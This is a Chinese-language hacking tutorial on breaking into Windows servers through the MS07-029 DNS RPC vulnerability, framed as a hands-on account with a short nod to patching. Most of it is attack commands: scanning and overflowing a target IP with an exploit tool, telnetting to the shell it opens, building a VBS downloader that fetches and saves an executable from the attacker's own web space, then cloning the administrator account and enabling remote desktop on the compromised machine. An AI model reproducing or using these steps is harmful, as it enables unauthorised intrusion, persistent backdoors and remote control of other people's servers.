親身體驗MS07-029漏洞入侵精簡版
以下的文章主要向大家描述的是親身體驗MS07-029漏洞入侵,在實際操作中有時系統(tǒng)漏洞對于企業(yè)服務(wù)器來說是具有致命作用的,黑客入侵時可以通過漏洞來獲得管理員權(quán)限從而將服務(wù)器玩弄于股掌之中。
MS07-029漏洞是一個服務(wù)器遠(yuǎn)程訪問漏洞,如果程序員沒有打上MS07-029漏洞補(bǔ)丁那么講受到致命的危害。所以在此提醒廣大的企業(yè)管理員,積極掃描自己的服務(wù)器,發(fā)現(xiàn)漏洞之后一定要及時采取行動,使得類似于MS07-029漏洞攻擊的情況避免出現(xiàn)。
我們先來看看所用工具的界面:
這就是傳說中的利用工具,可以通殺2000SEVER,2003SEVER系統(tǒng),另外還具備了掃描功能!
先用它來對主機(jī)進(jìn)行掃描:
在我們的命令行下輸入:“dns –s 目標(biāo)IP地址”
稍等片刻,開放的端口以及操作系統(tǒng)以出現(xiàn)在我們面前,如果出現(xiàn)了“1029:Vulnerability”那么恭喜你,你馬上就會成功得到這臺主機(jī)的權(quán)限了
現(xiàn)在我們來最關(guān)鍵的步驟――溢出:
在命令行內(nèi)輸入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系統(tǒng)的型號,-2003chs即簡體中文版的2003系統(tǒng),
如果是2000的系統(tǒng)就使用“-2000all”參數(shù),*.*.93.189就是我們的目標(biāo)IP地址,1029就是剛才掃描出存在漏洞的端口”。
出現(xiàn)“Attack sent ,check port 1100”字樣,說明已經(jīng)打開了目標(biāo)地址的1100端口,我們TELNET上去:TELNET *.*.93.189 1100
我們現(xiàn)在已經(jīng)成功的通過MS07-029漏洞入侵了對方的電腦,并且得到了管理員的權(quán)限。
下面我給大家介紹一下如何在肉雞上面開3389
在命令行里輸入
@echo with wscript:if .arguments.count^ tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs
大概的意思就是在命令行創(chuàng)立一個用來下載的VBS腳本tony.vbs
然后把開3389的工具上傳到你的個人空間,
我這里用的是火狐開3389的工具,在命令行里輸入 cscript tony.vbs http://你空間地址/wrsky.exe c:\wrsky.exe
wrsky.exe -c”可以克隆當(dāng)前管理員帳號
再輸入“c:\wrsky.exe -o 3551”
意思就是打開對方的遠(yuǎn)程桌面服務(wù),并且使用3551端口。
用“wrsky.exe -k”可以檢查3389是否開啟,開啟以后輸入“wrsky.exe -r”,對方的電腦就自動重啟以后就可以連接上去了。
在運(yùn)行里輸入"mstsc",登陸上去。
那熟悉而又親切的畫面出現(xiàn)在我們面前了。
如果是2K的系統(tǒng),還有一個更加傻瓜化的工具open3389,直接運(yùn)行就可以了,不需要任何參數(shù),不過對方電腦會馬上重啟。
另外我還放了其他兩個DNS利用工具和一篇ZWELL的精華文章在光盤里,有興趣的朋友可以自己研究。
這個漏洞的危害是是分巨大的,目前利用DNS服務(wù)RPC漏洞傳播的蠕蟲病毒VanBot已經(jīng)出現(xiàn),變種已經(jīng)開始瘋狂傳播。以上的相關(guān)內(nèi)容就是對親身體驗MS07-029漏洞入侵的介紹,望你能有所收獲。